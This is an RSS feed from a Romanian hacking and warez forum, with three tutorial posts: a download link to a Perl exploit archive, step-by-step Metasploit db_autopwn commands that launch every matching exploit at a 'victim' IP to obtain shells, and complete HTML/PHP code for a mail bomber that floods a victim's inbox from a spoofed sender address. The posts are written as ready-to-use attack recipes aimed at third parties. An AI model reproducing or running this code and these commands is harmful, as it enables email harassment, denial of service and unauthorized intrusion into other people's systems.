<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[...:: WarezBB ::... - Tutoriale H@ck]]></title>
		<link>http://warezbb.3x.ro/</link>
		<description><![CDATA[...:: WarezBB ::... - http://warezbb.3x.ro]]></description>
		<pubDate>Wed, 20 May 2026 19:24:57 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Cum sa rulezi un exploit in PERL]]></title>
			<link>http://warezbb.3x.ro/showthread.php?tid=9</link>
			<pubDate>Mon, 17 Sep 2007 00:20:35 +0000</pubDate>
			<guid isPermaLink="false">http://warezbb.3x.ro/showthread.php?tid=9</guid>
			<description><![CDATA[Download : <br />
<br />
Cod:<br />
http://rapidshare.com/files/36119016/PERL.rar<br />
<br />
]]></description>
			<content:encoded><![CDATA[Download : <br />
<br />
Cod:<br />
http://rapidshare.com/files/36119016/PERL.rar<br />
<br />
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cum sa automatizam exploit-urile in Metasploit]]></title>
			<link>http://warezbb.3x.ro/showthread.php?tid=8</link>
			<pubDate>Mon, 17 Sep 2007 00:11:55 +0000</pubDate>
			<guid isPermaLink="false">http://warezbb.3x.ro/showthread.php?tid=8</guid>
			<description><![CDATA[#Exemplu avansat de automatizare a exploiturilor pe un anumit tip de ip, folosind comenzi din consola shell[terminal] in metasploit<br />
# practic luam fiecare exploit din baza de date a metasploitului, si le testeaza pe serverul tinta Smile<br />
# ip ul 127.0.0.1 va fi folosit ca ip ul victimei Smile - voi o sa puneti alt ip<br />
# algoritmul "db_autopwn" are urmatoarele optiuni :<br />
<br />
-t : show all matching exploit modules<br />
-x : select modules based on vulnerability references<br />
-p : select modules based on open ports<br />
-e : launch exploits against all matched targets<br />
-s : only obtain a single shell per target system<br />
-r : use a reverse connect shell<br />
-b : use a bind shell on a random port<br />
-h : display this help text<br />
<br />
_____________________________________________<br />
<br />
Pasii care trebuiesc urmati:<br />
<br />
./msfconsole<br />
<br />
load db_postgres<br />
<br />
db_create tester<br />
<br />
db_hosts<br />
<br />
db_nmap 127.0.0.1 -p 445<br />
<br />
db_hosts<br />
<br />
db_autopwn<br />
<br />
db_autopwn -t -p -e -s -b<br />
<br />
sessions -l<br />
<br />
sessions -i 1<br />
<br />
Rezultatele se salveaza in postgres<br />
<br />
sper sa va fie de folos pt cei care utilizati metasploit.Numai Bine.]]></description>
			<content:encoded><![CDATA[#Exemplu avansat de automatizare a exploiturilor pe un anumit tip de ip, folosind comenzi din consola shell[terminal] in metasploit<br />
# practic luam fiecare exploit din baza de date a metasploitului, si le testeaza pe serverul tinta Smile<br />
# ip ul 127.0.0.1 va fi folosit ca ip ul victimei Smile - voi o sa puneti alt ip<br />
# algoritmul "db_autopwn" are urmatoarele optiuni :<br />
<br />
-t : show all matching exploit modules<br />
-x : select modules based on vulnerability references<br />
-p : select modules based on open ports<br />
-e : launch exploits against all matched targets<br />
-s : only obtain a single shell per target system<br />
-r : use a reverse connect shell<br />
-b : use a bind shell on a random port<br />
-h : display this help text<br />
<br />
_____________________________________________<br />
<br />
Pasii care trebuiesc urmati:<br />
<br />
./msfconsole<br />
<br />
load db_postgres<br />
<br />
db_create tester<br />
<br />
db_hosts<br />
<br />
db_nmap 127.0.0.1 -p 445<br />
<br />
db_hosts<br />
<br />
db_autopwn<br />
<br />
db_autopwn -t -p -e -s -b<br />
<br />
sessions -l<br />
<br />
sessions -i 1<br />
<br />
Rezultatele se salveaza in postgres<br />
<br />
sper sa va fie de folos pt cei care utilizati metasploit.Numai Bine.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[mail bomber]]></title>
			<link>http://warezbb.3x.ro/showthread.php?tid=7</link>
			<pubDate>Mon, 17 Sep 2007 00:04:41 +0000</pubDate>
			<guid isPermaLink="false">http://warezbb.3x.ro/showthread.php?tid=7</guid>
			<description><![CDATA[intai faceti un cont pe un host cum ar fi http://www.lx.ro sau alt host care sa accepte php si sa aiba functia mail activata dupa care deschideti notepad si scrieti asta: <br />
<br />
Cod:<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;Mailbomber&lt;/title&gt;<br />
&lt;style&gt;<br />
body{<br />
background-color:#000000; color:#666666; font-family:"Courier New", Courier, mono; font-size:13px;<br />
}<br />
input {<br />
font-family:"Courier New", Courier, mono; color: #666666; background-color:#000000;<br />
border: 1px solid #666666;<br />
text-align:center;<br />
}<br />
&lt;/style&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;center&gt;<br />
&lt;form name="hax" method="post"&gt;<br />
&lt;b&gt;Adresa ta:&lt;/b&gt;<br />
&lt;input name="from" type="text" alt="Enter your e-mail address (or a spoofed one)"&gt;&lt;/input&gt;<br />
&lt;b&gt;Adresa victimei:&lt;/b&gt;<br />
&lt;input name="to" type="text" alt="The address you wish to bomb"&gt;&lt;/input&gt;<br />
&lt;b&gt;Subiect:&lt;/b&gt;<br />
&lt;input name="subject" type="text" alt="The subject of the emails"&gt;&lt;/input&gt;&lt;br&gt; &lt;b&gt;Text:&lt;/b&gt;<br />
&lt;input name="body" type="text" alt="Body of the email"&gt;&lt;/input&gt;&lt;br&gt; &lt;b&gt;De cate ori:&lt;/b&gt;<br />
&lt;input name="times" type="text" size="3" alt="Send how many times?"&gt;&lt;/input&gt;&lt;br&gt;<br />
&lt;input name="submit" type="submit" value="Submit"&gt;<br />
&lt;/form&gt;<br />
&lt;/center&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;<br />
&amp;lt;?php<br />
&#36;from = &#36;_POST['from'];<br />
&#36;to = &#36;_POST['to'];<br />
&#36;subject = &#36;_POST['subject'];<br />
&#36;body = &#36;_POST['body'];<br />
&#36;times = &#36;_POST['times'];<br />
&#36;i = 0;<br />
while(&#36;i &lt; &#36;times){<br />
&nbsp;&nbsp; mail("&#36;to", "&#36;subject", "&#36;body", "From: &#36;from" );<br />
&nbsp;&nbsp; &#36;i++;<br />
}<br />
?&amp;gt;<br />
<br />
<br />
Dupa ce scrieti asta in notepad salvati ca "index.php" si uploadati-l pe site cu ajutorul unui client ftp(de exemplu SmartFTP care se gaseste pe http://www.softpedia.com) apoi intrati pe link si scrieti adresa voastra de mail sau alta(poate fi folosit si ca fake mail >Smile), adresa victimei, subiectul mail-ului, textul care vrei sa fie trimis victimei si de cate ori vrei sa fie trimis mail-ul. Sper ca v-am fost de ajutor.[/code]]]></description>
			<content:encoded><![CDATA[intai faceti un cont pe un host cum ar fi http://www.lx.ro sau alt host care sa accepte php si sa aiba functia mail activata dupa care deschideti notepad si scrieti asta: <br />
<br />
Cod:<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;Mailbomber&lt;/title&gt;<br />
&lt;style&gt;<br />
body{<br />
background-color:#000000; color:#666666; font-family:"Courier New", Courier, mono; font-size:13px;<br />
}<br />
input {<br />
font-family:"Courier New", Courier, mono; color: #666666; background-color:#000000;<br />
border: 1px solid #666666;<br />
text-align:center;<br />
}<br />
&lt;/style&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;center&gt;<br />
&lt;form name="hax" method="post"&gt;<br />
&lt;b&gt;Adresa ta:&lt;/b&gt;<br />
&lt;input name="from" type="text" alt="Enter your e-mail address (or a spoofed one)"&gt;&lt;/input&gt;<br />
&lt;b&gt;Adresa victimei:&lt;/b&gt;<br />
&lt;input name="to" type="text" alt="The address you wish to bomb"&gt;&lt;/input&gt;<br />
&lt;b&gt;Subiect:&lt;/b&gt;<br />
&lt;input name="subject" type="text" alt="The subject of the emails"&gt;&lt;/input&gt;&lt;br&gt; &lt;b&gt;Text:&lt;/b&gt;<br />
&lt;input name="body" type="text" alt="Body of the email"&gt;&lt;/input&gt;&lt;br&gt; &lt;b&gt;De cate ori:&lt;/b&gt;<br />
&lt;input name="times" type="text" size="3" alt="Send how many times?"&gt;&lt;/input&gt;&lt;br&gt;<br />
&lt;input name="submit" type="submit" value="Submit"&gt;<br />
&lt;/form&gt;<br />
&lt;/center&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;<br />
&amp;lt;?php<br />
&#36;from = &#36;_POST['from'];<br />
&#36;to = &#36;_POST['to'];<br />
&#36;subject = &#36;_POST['subject'];<br />
&#36;body = &#36;_POST['body'];<br />
&#36;times = &#36;_POST['times'];<br />
&#36;i = 0;<br />
while(&#36;i &lt; &#36;times){<br />
&nbsp;&nbsp; mail("&#36;to", "&#36;subject", "&#36;body", "From: &#36;from" );<br />
&nbsp;&nbsp; &#36;i++;<br />
}<br />
?&amp;gt;<br />
<br />
<br />
Dupa ce scrieti asta in notepad salvati ca "index.php" si uploadati-l pe site cu ajutorul unui client ftp(de exemplu SmartFTP care se gaseste pe http://www.softpedia.com) apoi intrati pe link si scrieti adresa voastra de mail sau alta(poate fi folosit si ca fake mail >Smile), adresa victimei, subiectul mail-ului, textul care vrei sa fie trimis victimei si de cate ori vrei sa fie trimis mail-ul. Sper ca v-am fost de ajutor.[/code]]]></content:encoded>
		</item>
	</channel>
</rss>